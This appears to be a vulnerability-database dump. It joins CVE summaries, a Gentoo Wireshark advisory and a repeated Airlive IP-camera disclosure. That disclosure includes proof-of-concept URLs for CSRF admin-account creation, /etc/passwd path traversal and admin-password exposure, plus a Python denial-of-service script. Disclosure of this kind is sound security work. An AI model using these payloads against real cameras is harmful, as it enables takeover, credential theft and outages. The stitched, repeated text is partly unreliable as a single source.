CVE-2013-3687 You can find all the sensitive information about the device in plain text inside the backup file.
You can open with any text editor and look for user's information for example, passwords, users and so on.
4.5.Denial of Service (DoS)
Use CVE-2013-3691, DoS by overbuffing path '/'. A request with a large number of 'a' can take down the HTTP service of the camera device.
_____________________________________________________________________________
Request: http://xx.xx.xx.xx/[a*3000]
_____________________________________________________________________________
You will get the next message: Connection has been reset. After you remove the added characters and refresh, you will get the next message: Can't Connect
It will be down for around 2 min, but if we repeat the request again and again, every 1 min for example, the camera won't ever recover by itself.
The following Python script could be used to test the DoS:
_____________________________________________________________________________
@ request = 'GET /' + 'A' * 3000 + '.html HTTP/1.0\r\n'
@ s = socket.socket()
@ s.connect((cam_ip, 80))
@ s.send(request)
@ response = s.recv(1024)
@ s.close()
_____________________________________________________________________________
5.Credits
-CVE-2013-3541 was discovered by Eliezer Varadé Lopez, Javier Repiso Sánchez and Jonás Ropero Castillo.
-CVE-2013-3691 was discovered by Javier Repiso Sánchez and Jonás Ropero Castillo
-CVE-2013-3540, CVE-2013-3686, CVE-2013-3687 were discovered by Jonás Ropero Castillo.
6.Report Timeline
-2013-05-31: Students team notifies the Airlive Customer Support of the vulnerabilities. No reply received.
-2013-06-03: Students ask for a reply.
-2013-06-05: Airlive team reports to the technical support to analyze the vulnerabilities.
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory GLSA 201308-05
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Severity: High
Title: Wireshark: Multiple vulnerabilities
Date: August 28, 2013
Bugs: #398549, #427964, #431572, #433990, #470262, #472762, #478694
ID: 201308-05
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Synopsis
========
Multiple vulnerabilities have been found in Wireshark, allowing remote
attackers to execute arbitrary code or cause Denial of Service.
Background
==========
Wireshark is a versatile network protocol analyzer.
Affected packages
=================
    -------------------------------------------------------------------
     Package              /     Vulnerable     /            Unaffected
    -------------------------------------------------------------------
  1  net-analyzer/wireshark       < 1.10.1                  >= 1.10.1
                                                            *>= 1.8.9
Description
===========
Multiple vulnerabilities have been discovered in Wireshark. Please
review the CVE identifiers referenced below for details.
Impact
======
A remote attacker could possibly execute arbitrary code with the
privileges of the process or cause a Denial of Service condition.
Workaround
==========
There is no known workaround at this time.
Resolution
==========
All Wireshark 1.10 users should upgrade to the latest version:
# emerge --sync
# emerge --ask --oneshot --verbose ">=net-analyzer/wireshark-1.10.1"
All Wireshark 1.8 users should upgrade to the latest version:
# emerge --sync
# emerge --ask --oneshot --verbose ">=net-analyzer/wireshark-1.8.9"
References
==========
[ 1 ] CVE-2012-0041
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0041
[ 2 ] CVE-2012-0042
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0042
[ 3 ] CVE-2012-0043
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0043
[ 4 ] CVE-2012-0066
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0066
[ 5 ] CVE-2012-0067
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0067
[ 6 ] CVE-2012-0068
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0068
[ 7 ] CVE-2012-3548
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3548
[ 8 ] CVE-2012-4048
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4048
[ 9 ] CVE-2012-4049
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4049
[ 10 ] CVE-2012-4285
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4285
[ 11 ] CVE-2012-4286
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4286
[ 12 ] CVE-2012-4287
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4287
[ 13 ] CVE-2012-4288
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4288
[ 14 ] CVE-2012-4289
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4289
[ 15 ] CVE-2012-4290
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4290
[ 16 ] CVE-2012-4291
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4291
[ 17 ] CVE-2012-4292
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4292
[ 18 ] CVE-2012-4293
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4293
[ 19 ] CVE-2012-4294
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4294
[ 20 ] CVE-2012-4295
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4295
[ 21 ] CVE-2012-4296
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4296
[ 22 ] CVE-2012-4297
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4297
[ 23 ] CVE-2012-4298
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-4298
[ 24 ] CVE-2013-3540
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-3540
[ 25 ] CVE-2013-3541
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-3541
[ 26 ] CVE-2013-3542
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-3542
[ 27 ] CVE-2013-3555
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-3555
[ 28 ] CVE-2013-3556
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-3556
[ 29 ] CVE-2013-3557
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-3557
[ 30 ] CVE-2013-3558
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-3558
[ 31 ] CVE-2013-3559
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-3559
[ 32 ] CVE-2013-4074
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-4074
[ 33 ] CVE-2013-4075
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-4075
[ 34 ] CVE-2013-4076
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-4076
[ 35 ] CVE-2013-4077
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-4077
[ 36 ] CVE-2013-4078
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-4078
[ 37 ] CVE-2013-4079
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-4079
[ 38 ] CVE-2013-4080
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-4080
[ 39 ] CVE-2013-4081
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-4081
[ 40 ] CVE-2013-4082
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-4082
[ 41 ] CVE-2013-4083
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-4083
[ 42 ] CVE-2013-4920
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-4920
[ 43 ] CVE-2013-4921
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-4921
[ 44 ] CVE-2013-4922
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-4922
[ 45 ] CVE-2013-4923
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-4923
[ 46 ] CVE-2013-4924
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-4924
[ 47 ] CVE-2013-4925
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-4925
[ 48 ] CVE-2013-4926
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-4926
[ 49 ] CVE-2013-4927
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-4927
[ 50 ] CVE-2013-4928
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-4928
[ 51 ] CVE-2013-4929
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-4929
[ 52 ] CVE-2013-4930
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-4930
[ 53 ] CVE-2013-4931
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-4931
[ 54 ] CVE-2013-4932
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-4932
[ 55 ] CVE-2013-4933
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-4933
[ 56 ] CVE-2013-4934
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-4934
[ 57 ] CVE-2013-4935
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-4935
[ 58 ] CVE-2013-4936
http://nvd.nist.gov/nvd.cfm?cvename=CVE-2013-4936
Availability
============
This GLSA and any updates to it are available for viewing at
the Gentoo Security Website:
http://security.gentoo.org/glsa/glsa-201308-05.xml
Concerns?
=========
Security is a primary focus of Gentoo Linux and ensuring the
confidentiality and security of our users' machines is of utmost
importance to us. Any security concerns should be addressed to
security@gentoo.org or alternatively, you may file a bug at
https://bugs.gentoo.org.
License
=======
Copyright 2013 Gentoo Foundation, Inc; referenced text
belongs to its owner(s).
The contents of this document are licensed under the
Creative Commons - Attribution / Share Alike license.
http://creativecommons.org/licenses/by-sa/2.5
| VAR-201310-0240 | CVE-2013-3541 | AirLive WL-2600CAM Model of cgi-bin/admin/fileread Vulnerable to directory traversal |
CVSS V2: 7.8 CVSS V3: - Severity: HIGH |
Directory traversal vulnerability in cgi-bin/admin/fileread in AirLive WL2600CAM and possibly other camera models allows remote attackers to read arbitrary files via a .. (dot dot) in the READ.filePath parameter. cgi-bin/admin/fileread in AirLive WL-2600CAM and other models contains a directory traversal vulnerability. By a third party .. Airlive IP Camera is an IP camera device. AirLive WL-2600CAM is prone to a directory-traversal vulnerability because it fails to sufficiently sanitize user-supplied input.
A remote attacker can exploit this issue to obtain sensitive information that could aid in further attacks.
===========================================================================
AIRLIVE
====================================================================
===========================================================================
1.Advisory Information
Title: Airlive Multiple Vulnerabilities
Date Published: 12/06/2013
Date of last updated: 12/06/2013
2.Vulnerability Description
Multiple vulnerabilities have been found in these devices:
-CVE-2013-3540. Cross Site Request Forgery(CWE-352) and Clickjacking(CAPEC-103)
-CVE-2013-3541. Relative Path Traversal(CWE-23).
-CVE-2013-3686. Information Exposure(CWE-200) and Permissions, Privileges and Access Controls(CWE-264)
-CVE-2013-3687. Clear Text Storage of Sensitive Information(CWE-312)
-CVE-2013-3691. Denial of Service
3.Affected Products
CVE-2013-3541, CVE-2013-3686, the following product is affected: WL2600CAM
CVE-2013-3540, CVE-2013-3687, the following products are affected: POE2600HD, POE250HD, POE200HD, OD-325HD, OD-2025HD, OD-2060HD, POE100HD.
It's possible other models are affected but they were not checked.
4.PoC
4.1.Cross Site Request Forgery (CSRF)
CVE-2013-3540 CSRF via GET method. Targeted attack to any administrator.
These cameras use a web interface which is prone to CSRF vulnerabilities.
A malicious user can try targeted attacks by sending a special CSRF vector. This allows you to manipulate web interface parameters.
In the following example we will make a vector to create an alternative user with administration credentials.
_____________________________________________________________________________
http://xx.xx.xx.xx/cgi-bin/admin/usrgrp.cgi?user=test1&pwd=test1&grp=administrator&sgrp=ptz&action=add&redirect=
_____________________________________________________________________________
4.2.Relative Path Traversal
CVE-2013-3541, Path Traversal that allows you to read file system configuration.
_____________________________________________________________________________
http://xx.xx.xx.xx/cgi-bin/admin/fileread?READ.filePath=../../../../etc/passwd
_____________________________________________________________________________
4.3.Sensitive Information Exposure + Privilege Escalation
CVE-2013-3686, Sensitive Exposure of sensitive data by writing the following URL
_____________________________________________________________________________
http://xx.xx.xx.xx/cgi-bin/operator/param?action=list&group=General.UserID
_____________________________________________________________________________
We can decode Admin password (base64).
Now we can relogin like admin user and we have made the escalation privilege
4.4.Clear Text Storage of Sensitive Information
CVE-2013-3687 You can find all the sensitive information about the device in plain text inside the backup file.
You can open with any text editor and look for user's information for example, passwords, users and so on.
4.5.Denial of Service (DoS)
Use CVE-2013-3691, DoS by overbuffing path '/'. A request with a large number of 'a' can take down the HTTP service of the camera device.
_____________________________________________________________________________
Request: http://xx.xx.xx.xx/[a*3000]
_____________________________________________________________________________
You will get the next message: Connection has been reset. After you remove the added characters and refresh, you will get the next message: Can't Connect
It will be down for around 2 min, but if we repeat the request again and again, every 1 min for example, the camera won't ever recover by itself.
The following Python script could be used to test the DoS:
_____________________________________________________________________________
@ request = 'GET /' + 'A' * 3000 + '.html HTTP/1.0\r\n'
@ s = socket.socket()
@ s.connect((cam_ip, 80))
@ s.send(request)
@ response = s.recv(1024)
@ s.close()
_____________________________________________________________________________
5.Credits
-CVE-2013-3541 was discovered by Eliezer Varadé Lopez, Javier Repiso Sánchez and Jonás Ropero Castillo.
-CVE-2013-3691 was discovered by Javier Repiso Sánchez and Jonás Ropero Castillo
-CVE-2013-3540, CVE-2013-3686, CVE-2013-3687 were discovered by Jonás Ropero Castillo.
6.Report Timeline
-2013-05-31: Students team notifies the Airlive Customer Support of the vulnerabilities. No reply received.
-2013-06-03: Students ask for a reply.
-2013-06-05: Airlive team reports to the technical support to analyze the vulnerabilities.
| VAR-201306-0317 | CVE-2013-3970 | Juniper Junos Pulse Secure Access Service and Junos Pulse Access Control Service SSL server impersonation vulnerability |
CVSS V2: 4.3 CVSS V3: - Severity: MEDIUM |
Juniper Junos Pulse Secure Access Service (aka SSL VPN) with IVE OS 7.0r2 through 7.0r8 and 7.1r1 through 7.1r5 and Junos Pulse Access Control Service (aka UAC) with UAC OS 4.1r1 through 4.1r5 include a test Certification Authority (CA) certificate in the Trusted Server CAs list, which makes it easier for man-in-the-middle attackers to spoof SSL servers by leveraging control over that test CA. Juniper Networks Junos Pulse Secure Access Service and Pulse Access Control Service are prone to a security vulnerability that allows attackers to perform man-in-the-middle attacks.
Remote attackers can exploit this issue to gain access to sensitive information; other attacks are also possible.
| VAR-201308-0293 | CVE-2013-5021 | National Instruments Multiple products cwui.ocx ActiveX Control Path Traversal Vulnerability |
CVSS V2: 9.3 CVSS V3: - Severity: HIGH |
Multiple absolute path traversal vulnerabilities in National Instruments cwui.ocx, as used in National Instruments LabWindows/CVI 2012 SP1 and earlier, National Instruments LabVIEW 2012 SP1 and earlier, the Data Analysis component in ABB DataManager 1 through 6.3.6, and other products, allow remote attackers to create and execute arbitrary files via a full pathname in an argument to the ExportStyle method in the (1) CWNumEdit, (2) CWGraph, (3) CWBoolean, (4) CWSlide, or (5) CWKnob ActiveX control, in conjunction with file content in the (a) Caption or (b) FormatString property value. This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of ABB DataManager Data Analysis. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within multiple third-party CWUI ActiveX controls. CWNumEdit, CWGraph, CWBoolean, CWSlide, and CWKnob all support an ExportStyle() method that allows creation of an arbitrary file with the desired extension in an arbitrary location. File content can be controlled by setting the 'Caption' or 'FormatString' property. An attacker can leverage this vulnerability to execute code in the context of the current process. National Instruments is a company dedicated to test measurement, automation and embedded applications. The CWUI ActiveX controls from National Instruments contain vulnerabilities that allow an attacker who builds a malicious web page and entices a user to open it to execute arbitrary code in the application context. Multiple National Instruments ActiveX controls are prone to a remote code-execution vulnerability caused by an insecure method.
An attacker can exploit this issue by enticing an unsuspecting user to view a malicious webpage. LabWindows/CVI and LabVIEW are products of National Instruments. LabWindows/CVI is a software development platform with ANSI C as the core; LabVIEW is a system design platform. ABB DataManager is data analysis software developed by the Swiss company ABB.
| VAR-201307-0139 | CVE-2013-1606 | Ubiquiti UBNT AirCam airVision firmware buffer overflow vulnerability. Related entries in the VARIoT exploits database: VAR-E-201306-0172 |
CVSS V2: 7.5 CVSS V3: - Severity: HIGH |
Buffer overflow in the ubnt-streamer RTSP service on the Ubiquiti UBNT AirCam with airVision firmware before 1.1.6 allows remote attackers to execute arbitrary code via a long rtsp: URI in a DESCRIBE request. Ubiquiti airCam is an IP network camera device. Multiple Ubiquiti airCam Products are prone to a buffer-overflow vulnerability.
An attacker can exploit this issue to execute arbitrary code within the context of the affected device. Failed exploit attempts will result in a denial-of-service condition.
airCam, airCam Mini, and airCam Dome running firmware 1.1.5 are vulnerable.
*Advisory Information*
Title: Buffer overflow in Ubiquiti airCam RTSP service
Advisory ID: CORE-2013-0430
Advisory URL: http://www.coresecurity.com/advisories/buffer-overflow-ubiquiti-aircam-rtsp-service
Date published: 2013-06-11
Date of last update: 2013-06-11
Vendors contacted: Ubiquiti
Release mode: Coordinated release
2. *Vulnerability Information*
Class: Classic buffer overflow [CWE-120]
Impact: Code execution
Remotely Exploitable: Yes
Locally Exploitable: No
CVE Name: CVE-2013-1606
3.
4. *Vulnerable Packages*
. Firmware Version Verified: AirCam v1.1.5. Other devices are..
| VAR-201307-0390 | CVE-2013-4878 | Parallels Plesk Panel Vulnerable to arbitrary code execution |
CVSS V2: 7.5 CVSS V3: - Severity: HIGH |
The default configuration of Parallels Plesk Panel 9.0.x and 9.2.x on UNIX, and Small Business Panel 10.x on UNIX, has an improper ScriptAlias directive for phppath, which makes it easier for remote attackers to execute arbitrary code via a crafted request, a different vulnerability than CVE-2012-1823. Parallels Plesk Panel contains a vulnerability that allows arbitrary code execution. On a web server running Parallels Plesk Panel, arbitrary code may be executed if the phppath aliasing issue and the same problem as CVE-2012-1823 exist simultaneously. In addition, according to CERT/CC, attacks using this problem are being carried out. Arbitrary code could be executed by a remote third party.